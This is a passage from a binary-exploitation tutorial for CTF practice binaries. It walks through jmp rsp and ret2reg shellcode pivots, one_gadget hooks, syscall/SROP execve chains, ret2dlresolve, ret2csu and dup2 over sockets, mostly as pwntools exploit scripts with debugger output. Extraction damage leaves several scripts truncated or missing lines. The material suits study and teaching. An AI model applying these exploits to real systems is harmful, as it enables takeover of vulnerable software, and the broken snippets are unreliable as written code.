The chance of jmp esp gadgets existing in the binary are incredible low, but what you
often do instead is find a sequence of bytes that code for jmp rsp and jump there -
jmp rsp is \xff\xe4 in shellcode, so if there's is any part of the executable section with
bytes in this order, they can be used as if they are a jmp rsp .

Exploitation 97/240
4/10/24, 12:28 PM Binary Exploitation

Try to do this yourself first, using the explanation on the previous page. Remember,
RSP points at the thing after the return pointer once ret has occured, so your
shellcode goes after it.


from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

# we use because we don't need those instructions directly,

# just anu sequence of \xff\xe4
jmp_rsp = next('jmp rsp')))

payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we j
asm( # place the shellcode

p.sendlineafter('RSP!\n', payload)

Limited Space
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What
you can do in this scenario is make the shellcode after the RIP equivalent to something

sub rsp, 0x20

jmp rsp

Where 0x20 is the offset between the current value of RSP and the start of the buffer.
In the buffer itself, we put the main shellcode. Let's try that! 98/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

jmp_rsp = next('jmp rsp')))

payload = b'A' * 120

payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 10;
jmp rsp;

p.sendlineafter('RSP!\n', payload)

The 10 is just a placeholder. Once we hit the pause() , we attach with radare2 and
set a breakpoint on the ret , then continue. Once we hit it, we find the beginning of
the A string and work out the offset between that and the current value of RSP - it's
128 !


from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

jmp_rsp = next('jmp rsp')))

payload = asm(
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2

p.sendlineafter('RSP!\n', payload)
p.interactive() 99/240
4/10/24, 12:28 PM Binary Exploitation

We successfully pivoted back to our shellcode - and because all our addresses are
relative, it's completely reliable! ASLR beaten with pure shellcode.

This is harder with PIE as the location of jmp rsp will change, so you might have to leak
PIE base! 100/240
4/10/24, 12:28 PM Binary Exploitation

Using Registers to bypass ASLR

ret2reg simply involves jumping to register addresses rather than hardcoded

addresses, much like Using RSP for Shellcode. For example, you may find RAX always
points at your buffer when the ret is executed, so you could utilise a call rax or
jmp rax to continue from there.

The reason RAX is the most common for this technique is that, by convention, the
return value of a function is stored in RAX. For example, take the following basic code:

#include <stdio.h>

int test() {
return 0xdeadbeef;

int main() {
return 0;

If we compile and disassemble the function, we get this:

0x55ea94f68125 55 push rbp

0x55ea94f68126 4889e5 mov rbp, rsp
0x55ea94f68129 b8efbeadde mov eax, 0xdeadbeef
0x55ea94f6812e 5d pop rbp
0x55ea94f6812f c3 ret

As you can see, the value 0xdeadbeef is being moved into EAX. 101/240
4/10/24, 12:28 PM Binary Exploitation

Using ret2reg

Any function that returns a pointer to the string once it acts on it is a prime target.
There are many that do this, including stuff like gets() , strcpy() and fgets() .
We''l keep it simple and use gets() as an example.

#include <stdio.h>

void vuln() {
char buffer[100];

int main() {
return 0;

First, let's make sure that some register does point to the buffer: 102/240
4/10/24, 12:28 PM Binary Exploitation

$ r2 -d -A vuln

[0x7f8ac76fa090]> pdf @ sym.vuln

; CALL XREF from main @ 0x401147
┌ 28: sym.vuln ();
│ ; var int64_t var_70h @ rbp-0x70
│ 0x00401122 55 push rbp
│ 0x00401123 4889e5 mov rbp, rsp
│ 0x00401126 4883ec70 sub rsp, 0x70
│ 0x0040112a 488d4590 lea rax, [var_70h]
│ 0x0040112e 4889c7 mov rdi, rax
│ 0x00401131 b800000000 mov eax, 0
│ 0x00401136 e8f5feffff call sym.imp.gets ;
│ 0x0040113b 90 nop
│ 0x0040113c c9 leave
└ 0x0040113d c3 ret

Now we'll set a breakpoint on the ret in vuln() , continue and enter text .

[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hit breakpoint at: 40113d

We've hit the breakpoint, let's check if RAX points to our register. We'll assume RAX
first because that's the traditional register to use for the return value.

[0x0040113d]> dr rax
[0x0040113d]> ps @ 0x7ffd419895c0

And indeed it does!

We now just need a jmp rax gadget or equivalent. I'll use ROPgadget for this and look
for either jmp rax or call rax : 103/240
4/10/24, 12:28 PM Binary Exploitation

$ ROPgadget --binary vuln | grep -iE "(jmp|call) rax"

0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401019

0x0000000000401010 : call rax
0x000000000040100e : je 0x401014 ; call rax
0x0000000000401095 : je 0x4010a7 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d7 : je 0x4010e7 ; mov edi, 0x404030 ; jmp rax
0x000000000040109c : jmp rax
0x0000000000401097 : mov edi, 0x404030 ; jmp rax
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x000000000040100c : test eax, eax ; je 0x401016 ; call rax
0x0000000000401093 : test eax, eax ; je 0x4010a9 ; mov edi, 0x404030 ; jm
0x00000000004010d5 : test eax, eax ; je 0x4010e9 ; mov edi, 0x404030 ; jm
0x000000000040100b : test rax, rax ; je 0x401017 ; call rax

There's a jmp rax at 0x40109c , so I'll use that. The padding up until RIP is 120 ; I
assume you can calculate this yourselves by now, so I won't bother showing it.

from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

JMP_RAX = 0x40109c

payload = asm( # front of buffer <- RAX points her

payload = payload.ljust(120, b'A') # pad until RIP
payload += p64(JMP_RAX) # jump to the buffer - return value

p.interactive() 104/240
4/10/24, 12:28 PM Binary Exploitation

Awesome! 105/240
4/10/24, 12:28 PM Binary Exploitation

One Gadgets and Malloc Hook

Quick shells and pointers

A one_gadget is simply an execve("/bin/sh") command that is present in gLIBC,

and this can be a quick win with GOT overwrites - next time the function is called, the
one_gadget is executed and the shell is popped.

__malloc_hook is a feature in C. The Official GNU site defines __malloc_hook as:

The value of this variable is a pointer to the function that malloc uses whenever it
is called.

To summarise, when you call malloc() the function __malloc_hook points to also
gets called - so if we can overwrite this with, say, a one_gadget , and somehow trigger
a call to malloc() , we can get an easy shell.

Finding One_Gadgets

Luckily there is a tool written in Ruby called one_gadget . To install it, run:

gem install one_gadget

And then you can simply run

one_gadget libc

For most one_gadgets, certain criteria have to be met. This means they won't all work - in
fact, none of them may work.

Triggering malloc()

Wait a sec - isn't malloc() a heap function? How will we use it on the stack? Well, you
can actually trigger malloc by calling printf("%10000$c") (this allocates too many 106/240
4/10/24, 12:28 PM Binary Exploitation

bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you
have a format string vulnerability, calling malloc is trivial.


This is a hard technique to give you practise on, due to the fact that your libc version
may not even have working one_gadgets . As such, feel free to play around with the
GOT overwrite binary and see if you can get a one_gadget working.

Remember, the value given by the one_gadget tool needs to be added to libc base as
it's just an offset. 107/240
4/10/24, 12:28 PM Binary Exploitation

Interfacing directly with the kernel


A syscall is a system call, and is how the program enters the kernel in order to carry
out specific tasks such as creating processes, I/O and any others they would require
kernel-level access.

Browsing the list of syscalls, you may notice that certain syscalls are similar to libc
functions such as open() , fork() or read() ; this is because these functions are
simply wrappers around the syscalls, making it much easier for the programmer.

Triggering Syscalls

On Linux, a syscall is triggered by the int80 instruction. Once it's called, the kernel
checks the value stored in RAX - this is the syscall number, which defines what syscall
gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc and
every parameter has a different meaning for the different syscalls.


A notable syscall is the execve syscall, which executes the program passed to it in RDI.
RSI and RDX hold arvp and envp respectively.

This means, if there is no system() function, we can use execve to call /bin/sh
instead - all we have to do is pass in a pointer to /bin/sh to RDI, and populate RSI and
RDX with 0 (this is because both argv and envp need to be NULL to pop a shell). 108/240
4/10/24, 12:28 PM Binary Exploitation

Exploitation with Syscalls

The Source

To make it super simple, I made it in assembly using pwntools:

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF.from_assembly(
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 300;

pop rax;
pop rdi;
pop rsi;
pop rdx;

The binary contains all the gadgets you need! First it executes a read syscall, writes to
the stack, then the ret occurs and you can gain control.

But what about the /bin/sh ? I slightly cheesed this one and couldn't be bothered to
add it to the assembly, so I just did: 109/240
4/10/24, 12:28 PM Binary Exploitation

echo -en "/bin/sh\x00" >> vuln


As we mentioned before, we need the following layout in the registers:

RAX: 0x3b
RDI: pointer to /bin/sh
RSI: 0x0
RDX: 0x0

To get the address of the gadgets, I'll just do objdump -d vuln . The address of
/bin/sh can be gotten using strings:

$ strings -t x vuln | grep bin

1250 /bin/sh

The offset from the base to the string is 0x1250 ( -t x tells strings to print the
offset as hex). Armed with all this information, we can set up the constants:

from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

binsh = elf.address + 0x1250

POP_RAX = 0x10000018
POP_RDI = 0x1000001a
POP_RSI = 0x1000001c
POP_RDX = 0x1000001e
SYSCALL = 0x10000015

Now we just need to populate the registers. I'll tell you the padding is 8 to save time: 110/240
4/10/24, 12:28 PM Binary Exploitation

payload = flat(
'A' * 8,


And wehey - we get a shell! 111/240
4/10/24, 12:28 PM Binary Exploitation

Programming (SROP)
Controlling all registers at once


A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the
signal handler and to clean up the stack frame after a signal has been unblocked.

What this involves is storing all the register values on the stack. Once the signal is
unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn
frame, this collection of register values).


By leveraging a sigreturn , we can control all register values at once - amazing! Yet
this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack
leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a
super powerful technique - especially with limited gadgets. 112/240
4/10/24, 12:28 PM Binary Exploitation

Using SROP

As with the syscalls, I made the binary using the pwntools ELF features:

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF.from_assembly(
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 500;

pop rax;
''', vma=0x41000

It's quite simple - a read syscall, followed by a pop rax; ret gadget. You can't
control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.

Once again, I added /bin/sh to the binary:

echo -en "/bin/bash\x00" >> vuln

First let's plonk down the available gadgets and their location, as well as the location of
/bin/sh . 113/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)

p = process()

BINSH = elf.address + 0x1250

POP_RAX = 0x41018
SYSCALL_RET = 0x41015

From here, I suggest you try the payload yourself. The padding (as you can see in the
assembly) is 8 bytes until RIP, then you'll need to trigger a sigreturn , followed by
the values of the registers.

The triggering of a sigreturn is easy - sigreturn is syscall 0xf ( 15 ), so we just pop

that into RAX and call syscall :

payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)

Now the syscall looks at the location of RSP for the register values; we'll have to fake
them. They have to be in a specific order, but luckily for us pwntools has a cool feature
called a SigreturnFrame() that handles the order for us.

frame = SigreturnFrame()

Now we just need to decide what the register values should be. We want to trigger an
execve() syscall, so we'll set the registers to the values we need for that:

frame.rax = 0x3b # syscall number for execve

frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL

However, in order to trigger this we also have to control RIP and point it back at the
syscall gadget, so the execve actually executes: 114/240
4/10/24, 12:28 PM Binary Exploitation = SYSCALL_RET

We then append it to the payload and send.

payload += bytes(frame)


Final Exploit 115/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)

p = process()

BINSH = elf.address + 0x1250

POP_RAX = 0x41018
SYSCALL_RET = 0x41015

frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL = SYSCALL_RET

payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
payload += bytes(frame)

p.interactive() 116/240
4/10/24, 12:28 PM Binary Exploitation

Resolving our own libc functions

Broad Overview
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its
choice (such as system ) into the PLT. This then means the attacker can use the PLT
function as if it was originally part of the binary, bypassing ASLR (if present) and
requiring no libc leaks.

Detailed Overview
Dynamically-linked ELF objects import libc functions when they are first called using
the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT
and attempt to resolve the symbol. During this process a "resolver" is called.

For all these screenshots, I broke at read@plt . I'm using GDB with the pwndbg plugin as
it shows it a bit better. 117/240
4/10/24, 12:28 PM Binary Exploitation

The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it
points back to the instruction after the jmp in the PLT to resolve it.

In order to resolve the functions, there are 3 structures that need to exist within the
binary. Faking these 3 structures could enable us to trick the linker into resolving a
function of our choice, and we can also pass parameters in (such as /bin/sh ) once

There are 3 structures we need to fake.

$readelf -d source

Dynamic section at offset 0x2f14 contains 24 entries:

Tag Type Name/Value
0x00000005 (STRTAB) 0x804825c
0x00000006 (SYMTAB) 0x804820c
0x00000017 (JMPREL) 0x80482d8
[...] 118/240
4/10/24, 12:28 PM Binary Exploitation


The JMPREL segment ( .rel.plt ) stores the Relocation Table, which maps each
entry to a symbol.

$readelf -r source

Relocation section '.rel.dyn' at offset 0x2d0 contains 1 entry:

Offset Info Type Sym.Value Sym. Name
0804bffc 00000206 R_386_GLOB_DAT 00000000 __gmon_start__

Relocation section '.rel.plt' at offset 0x2d8 contains 2 entries:

Offset Info Type Sym.Value Sym. Name
0804c00c 00000107 R_386_JUMP_SLOT 00000000 gets@GLIBC_2.0
0804c010 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2

These entries are of type Elf32_Rel :

typedef uint32_t Elf32_Addr;

typedef uint32_t Elf32_Word;
typedef struct
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol ind
} Elf32_Rel;
/* How to extract and insert information held in the r_info field. */
#define ELF32_R_SYM(val) ((val) >> 8)
#define ELF32_R_TYPE(val) ((val) & 0xff)

The column name coresponds to our symbol name. The offset is the GOT entry for
our symbol. info stores additional metadata.

Note the due to this the R_SYM of gets is 1 as 0x107 >> 8 = 1 .


Much simpler - just a table of strings for the names. 119/240
4/10/24, 12:28 PM Binary Exploitation


Symbol information is stores here in an Elf32_Sym struct:

typedef struct
Elf32_Word st_name ; /* Symbol name (string tbl index) */
Elf32_Addr st_value ; /* Symbol value */
Elf32_Word st_size ; /* Symbol size */
unsigned char st_info ; /* Symbol type and binding */
unsigned char st_other ; /* Symbol visibility under glibc>=2.2 */
Elf32_Section st_shndx ; /* Section index */
} Elf32_Sym ;

The most important value here is st_name as this gives the offset in STRTAB of the
symbol name. The other fields are not relevant to the exploit itself.

Linking the Structures

We now know we can get the STRTAB offset of the symbol's string using the R_SYM
value we got from the JMPREL , combined with SYMTAB : 120/240
4/10/24, 12:28 PM Binary Exploitation

Here we're reading SYMTAB + R_SYM * size (16) , and it appears that the offset (the
SYMTAB st_name variable) is 0x10 .

And if we read that offset on STRTAB , we get the symbol's name!

More on the PLT and GOT 121/240
4/10/24, 12:28 PM Binary Exploitation

Let's hop back to the GOT and PLT for a slightly more in-depth look.

If the GOT entry is unpopulated, we push the reloc_offset value and jump to the
beginning of the .plt section. A few instructions later, the dl-resolve() function is
called, with reloc_offset being one of the arguments. It then uses this
reloc_offset to calculate the relocation and symtab entries.

The Original Phrack Article

0ctf's babystack
rk700 (in Chinese) 122/240
4/10/24, 12:28 PM Binary Exploitation


To display an example program, we will use the example given on the pwntools entry
for ret2dlresolve:

#include <unistd.h>
void vuln(void){
char buf[64];
read(STDIN_FILENO, buf, 200);
int main(int argc, char** argv){

pwntools contains a fancy Ret2dlresolvePayload that can automate the majority of
our exploit:

# create the dlresolve object

dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76), dlresolve.data_addr) # read to where we want to w
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve()

p.sendline(dlresolve.payload) # now the read is called and

Let's use rop.dump() to break down what's happening. 123/240
4/10/24, 12:28 PM Binary Exploitation

[DEBUG] PLT 0x8049030 read

[DEBUG] PLT 0x8049040 __libc_start_main
[DEBUG] Symtab: 0x804820c
[DEBUG] Strtab: 0x804825c
[DEBUG] Versym: 0x80482a6
[DEBUG] Jmprel: 0x80482d8
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
[DEBUG] Version index addr: 0x8048c26
[DEBUG] Data addr: 0x804ce00
[DEBUG] PLT_INIT: 0x8049020
0x004c: 0x8049030 read(0, 0x804ce00)
0x0050: 0x804921a <adjust @0x5c> pop edi; pop ebp; ret
0x0054: 0x0 arg0
0x0058: 0x804ce00 arg1
0x005c: 0x8049020 [plt_init] system(0x804ce24)
0x0060: 0x4b44 [dlresolve index]
0x0064: b'zaab' <return address>
0x0068: 0x804ce24 arg0

As we expected - it's a read followed by a call to plt_init with the parameter

0x0804ce24 . Our fake structures are being read in at 0x804ce00 . The logging at the
top tells us where all the structures are placed.

[DEBUG] ElfSym addr: 0x804ce0c

[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00

Now we know where the fake structures are placed. Since I ran the script with the
DEBUG parameter, I'll check what gets sent.

00000000 73 79 73 74 65 6d 00 61 63 61 61 61 a4 4b 00 00 │syst│em·a
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 ce 04 08 │····│····
00000020 07 c0 04 00 2f 62 69 6e 2f 73 68 00 0a │····│/bin

system is being written to 0x804ce00 - as the debug said the Symbol name addr
would be placed 124/240
4/10/24, 12:28 PM Binary Exploitation

After that, at 0x804ce0c , the Elf32_Sym struct starts. First it contains the table
index of that string, which in this case is 0x4ba4 as it is a very long way off the
actual table. Next it contains the other values on the struct, but they are irrelevant
and so zeroed out.
At 0x804ce1c that Elf32_Rel struct starts; first it contains the address of the
system string, 0x0804ce00 , then the r_info variable - if you remember this
specifies the R_SYM , which is used to link the SYMTAB and the STRTAB .

After all the structures we place the string /bin/sh at 0x804ce24 - which, if you
remember, was the argument passed to system when we printed the rop.dump() :

0x005c: 0x8049020 [plt_init] system(0x804ce24)

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)

p = elf.process()
rop = ROP(elf)

# create the dlresolve object

dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76), dlresolve.data_addr) # read to where we want to write the fak
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the co

p.sendline(dlresolve.payload) # now the read is called and we pass all

p.interactive() 125/240
4/10/24, 12:28 PM Binary Exploitation

Controlling registers when gadgets are lacking

ret2csu is a technique for populating registers when there is a lack of gadgets. More
information can be found in the original paper, but a summary is as follows:

When an application is dynamically compiled (compiled with libc linked to it), there is a
selection of functions it contains to allow the linking. These functions contain within
them a selection of gadgets that we can use to populate registers we lack gadgets for,
most importantly __libc_csu_init , which contains the following two gadgets:

0x004011a2 5b pop rbx

0x004011a3 5d pop rbp
0x004011a4 415c pop r12
0x004011a6 415d pop r13
0x004011a8 415e pop r14
0x004011aa 415f pop r15
0x004011ac c3 ret

0x00401188 4c89f2 mov rdx, r14 ; char **ubp_a

0x0040118b 4c89ee mov rsi, r13 ; int argc
0x0040118e 4489e7 mov edi, r12d ; func main
0x00401191 41ff14df call qword [r15 + rbx*8]

The second might not look like a gadget, but if you look it calls r15 + rbx*8 . The first
gadget chain allows us to control both r15 and rbx in that series of huge pop
operations, meaning whe can control where the second gadget calls afterwards.

Note it's call qword [r15 + rbx*8] , not call qword r15 + rbx*8 . This means it'll
calculate r15 + rbx*8 then go to that memory address, read it, and call that value.
This mean we have to find a memory address that contains where we want to jump.

These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX
and RSI registers (which are important for parameters) via the second gadget, then
jump wherever we wish by simply controlling r15 and rbx to workable values. 126/240
4/10/24, 12:28 PM Binary Exploitation

This means we can potentially pull off syscalls for execve , or populate parameters for
functions such as write() .

You may wonder why we would do something like this if we're linked to libc - why not just
read the GOT? Well, some functions - such as write() - require three parameters (and at
least 2), so we would require ret2csu to populate them if there was a lack of gadgets. 127/240
4/10/24, 12:28 PM Binary Exploitation


#include <stdio.h>

int win(int x, int y, int z) {

if(z == 0xdeadbeefcafed00d) {
puts("Awesome work!");

int main() {
puts("Come on then, ret2csu me");

char input[30];
return 0;

Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of
this. Try calling win() , and to do that you have to populate the register rdx . Try what
we've talked about, and then have a look at the answer if you get stuck.

We can work out the addresses of the massive chains using r2, and chuck this all into
pwntools. 128/240
4/10/24, 12:28 PM Binary Exploitation

0x00401208 4c89f2 mov rdx, r14
0x0040120b 4c89ee mov rsi, r13
0x0040120e 4489e7 mov edi, r12d
0x00401211 41ff14df call qword [r15 + rbx*8]
0x00401215 4883c301 add rbx, 1
0x00401219 4839dd cmp rbp, rbx
0x0040121c 75ea jne 0x401208
0x0040121e 4883c408 add rsp, 8
0x00401222 5b pop rbx
0x00401223 5d pop rbp
0x00401224 415c pop r12
0x00401226 415d pop r13
0x00401228 415e pop r14
0x0040122a 415f pop r15
0x0040122c c3 ret

from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret

REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]

Note I'm not popping RBX, despite the call . This is because RBX ends up being 0
anyway, and you want to mess with the least number of registers you need to to ensure
the best success.


Finding a win()

Now we need to find a memory location that has the address of win() written into it
so that we can point r15 at it. I'm going to opt to call gets() again instead, and then
input the address. The location we input to is a fixed location of our choice, which is
reliable. Now we just need to find a location. 129/240
4/10/24, 12:28 PM Binary Exploitation

To do this, I'll run r2 on the binary then dcu main to contiune until main. Now let's
check permissions:

[0x00401199]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r--
0x0000000000401000 - 0x0000000000402000 * usr 4K s r-x
0x0000000000402000 - 0x0000000000403000 - usr 4K s r--
0x0000000000403000 - 0x0000000000404000 - usr 4K s r--
0x0000000000404000 - 0x0000000000405000 - usr 4K s rw-

The third location is RW, so let's check it out.

0x00401199]> pxq @ 0x0000000000404000

0x00404000 0x0000000000403e20 0x00007f7235252180 >@......!%5r...
0x00404010 0x00007f723523c5e0 0x0000000000401036 ..#5r...6.@.....
0x00404020 0x0000000000401046 0x0000000000000000 F.@.............

The address 0x404028 appears unused, so I'll write win() there.

RW_LOC = 0x00404028

Reading in win()

To do this, I'll just use the ROP class.

rop.raw('A' * 40)

Popping the registers

Now we have the address written there, let's just get the massive ropchain and plonk it
all in 130/240
4/10/24, 12:28 PM Binary Exploitation

rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call

Sending it off

Don't forget to pass a parameter to the gets() :

p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's writt
print(p.recvline()) # should receive "Awesome work

Final Exploit
from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret

REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028

rop.raw('A' * 40)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call

p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's writt
print(p.recvline()) # should receive "Awesome work

And we have successfully controlled RDX - without any RDX gadgets! 131/240
4/10/24, 12:28 PM Binary Exploitation

As you probably noticed, we don't need to pop off r12 or r13, so we can move
POP_CHAIN a couple of intructions along:

from pwn import *

elf = context.binary = ELF('./vuln')

p = process()

rop = ROP(elf)

POP_CHAIN = 0x00401228 # pop r14, pop r15, ret

REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028

rop.raw('A' * 40)
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call

p.sendlineafter('me\n', rop.chain())
print(p.recvline()) 132/240
4/10/24, 12:28 PM Binary Exploitation

Exploiting over Sockets

File Descriptors and Sockets

File Descriptors are integers that represent conections to sockets or files or whatever
you're connecting to. In Unix systems, there are 3 main file descriptors (often
abbreviated fd) for each application:

Name fd

stdin 0

stdout 1

stderr 2

These are, as shown above, standard input, output and error. You've probably used
them before yourself, for example to hide errors when running commands:

find / -name secret.txt 2>/dev/null

Here you're piping stderr to /dev/null , which is the same principle.

File Descriptors and Sockets

Many binaries in CTFs use programs such as socat to redirect stdin and stdout
(and sometimes stderr ) to the user when they connect. These are super simple and
often require no more than a replacement of

p = process() 133/240
4/10/24, 12:28 PM Binary Exploitation

With the line

p = remote(host, port)

Others, however, implement their own socket programming in C. In these scenarios,

stdin and stdout may not be shown back to the user.

The reason for this is every new connection has a different fd. If you listen in C, since fd
0-2 is reserved, the listening socket will often be assigned fd 3 . Once we connect, we
set up another fd, fd 4 (neither the 3 nor the 4 is certain, but statistically likely).

Exploitation with File Desciptors

In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown
back to the user - it's shown back to the terminal running the server. Why? Because it
utilises fd 0 , 1 and 2 for its I/O.

Here we have to tell the program to duplicate the file descriptor in order to redirect
stdin and stderr to fd 4 , and glibc provides a simple way to do so.

The dup syscall (and C function) duplicates the fd and uses the lowest-numbered free
fd. However, we need to ensure it's fd 4 that's used, so we can use dup2() . dup2
takes in two parameters: a newfd and an oldfd . Descriptor oldfd is duplicated to
newfd , allowing us to interact with stdin and stdout and actually use any shell we
may have popped.

Note that the man page outlines how if newfd is in use it is silently closed, which is
exactly what we wish. 134/240
4/10/24, 12:28 PM Binary Exploitation

Duplicating the Descriptors

I'll include source.c , but most of it is socket programming derived from here. The two
relevent functions - vuln() and win() - I'll list below.

void vuln(int childfd) {

char buffer[30];

read(childfd, buffer, 500);

write(childfd, "Thanks!", 8);

void win() {

Quite literally an easy ret2win.

Start the binary with ./vuln 9001 .

Basic setup, except it's a remote process:

from pwn import *

elf = context.binary = ELF('./vuln')

p = remote('localhost', 9001) 135/240
4/10/24, 12:28 PM Binary Exploitation

Testing Offset

I pass in a basic De Bruijn pattern and pause directly before:



Once the pause() is reached, I hook on with radare2 and set a breakpoint at the ret .

$ r2 -d -A $(pidof vuln)

[0x7f741033bdee]> pdf @ sym.vuln

└ 0x0040126b c3 ret

[0x7f741033bdee]> db 0x0040126b
[0x7f741033bdee]> dc
hit breakpoint at: 40126b

[0x0040126b]> pxq @ rsp

0x7ffd323ee6f8 0x41415041414f4141 0x4153414152414151 AAOAAPAAQAARAASA

[0x0040126b]> wopO 0x41415041414f4141


Ok, so the offset is 40 .

Generate Exploit

Should be fairly simple, right? 136/240
4/10/24, 12:28 PM Binary Exploitation

payload = flat(
'A' * 40,


What the hell?

But if we look on the server itself: 137/240
4/10/24, 12:28 PM Binary Exploitation

A shell was popped there! This is the file descriptor issue we talked about before.

So we have a shell, but no way to control it. Time to use dup2 .

I've simplified this challenge a lot by including a call to dup2() within the vulnerable
binary, but normally you would leak libc via the GOT and then use libc's dup2() rather
than the PLT; this walkthrough is about the basics, so I kept it as simple as possible.

Duplicating File Descriptors

As we know, we need to call dup2(newfd, oldfd) . newfd will be 4 (our connection

fd) and oldfd will be 0 and 1 (we need to call it twice to redirect both stdin and
stdout ). Knowing what you do about calling conventions, have a go at doing this and
then caling win() . The answer is below.

Using dup2()

Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use
ROPgadget to find these.

$ ROPgadget --binary vuln | grep "pop rdi"

0x000000000040150b : pop rdi ; ret

$ ROPgadget --binary vuln | grep "pop rsi"

0x0000000000401509 : pop rsi ; pop r15 ; ret

Plonk these values into the script.

POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509

Now to get all the calls to dup2() . 138/240
4/10/24, 12:28 PM Binary Exploitation

payload = flat(
'A' * 40,

4, # newfd
0, # oldfd -> stdin
0, # junk r15

4, # newfd
1, # oldfd -> stdout
0, # junk r15



And wehey - the file descriptors were successfully duplicated! 139/240
4/10/24, 12:28 PM Binary Exploitation

Final Exploit
from pwn import *

elf = context.binary = ELF('./vuln')

p = remote('localhost', 9001)

POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509

payload = flat(
'A' * 40,

4, # newfd
0, # oldfd -> stdin
0, # junk r15

4, # newfd
1, # oldfd -> stdout
0, # junk r15



Pwntools' ROP
These kinds of chains are where pwntools' ROP capabilities really come into their own: 140/240
4/10/24, 12:28 PM Binary Exploitation

from pwn import *

elf = context.binary = ELF('./vuln')

p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)


Works perfectly and is much shorter and more readable! 141/240
4/10/24, 12:28 PM Binary Exploitation

More on socat

socat is a "multipurpose relay" often used to serve binary exploitation challenges in

CTFs. Essentially, it transfers stdin and stdout to the socket and also allows simple
forking capabilities. The following is an example of how you could host a binary on port
5000 :

socat tcp-l:5000,reuseaddr,fork EXEC:"./vuln",pty,stderr

Most of the command is fairly logical (and the rest you can look up). The important part
is that in this scenario we don't have to redirect file descriptors, as socat does it all
for us.

What is important, however, is pty mode. Because pty mode allows you to
communicate with the process as if you were a user, it takes in input literally - including
DELETE characters. If you send a \x7f - a DELETE - it will literally delete the
previous character (as shown shortly in my Dream Diary: Chapter 1 writeup). This is
